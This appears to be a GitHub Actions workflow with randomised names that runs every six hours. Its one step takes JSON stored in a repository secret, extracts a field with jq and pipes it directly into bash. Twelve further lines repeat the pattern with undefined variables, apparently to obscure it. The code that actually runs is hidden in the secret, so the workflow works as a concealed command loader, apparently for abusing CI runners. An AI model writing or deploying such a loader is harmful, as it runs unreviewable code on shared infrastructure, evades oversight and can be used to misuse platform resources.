name: zhongguihong3948

on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongguihong3948
        env:
          g6719: ${{ secrets.g6719 }}
        run: |
          echo $g6719 | jq -r .frkrk1203 | /bin/bash
          echo $iapan7 | jq -r .a4 | /bin/bash
          echo $cpd039 | jq -r .pu71 | /bin/bash
          echo $o2149 | jq -r .x7 | /bin/bash
          echo $g112 | jq -r .xdoax0759 | /bin/bash
          echo $rzz742 | jq -r .tqlue7717 | /bin/bash
          echo $m48512 | jq -r .e0 | /bin/bash
          echo $eaq12448 | jq -r .dclmx084 | /bin/bash
          echo $qchqr57 | jq -r .v11 | /bin/bash
          echo $wk1 | jq -r .ywzw4427 | /bin/bash
          echo $eqx53 | jq -r .fljef59 | /bin/bash
          echo $jq01473 | jq -r .hjnes690 | /bin/bash
          echo $oo1 | jq -r .t6996 | /bin/bash

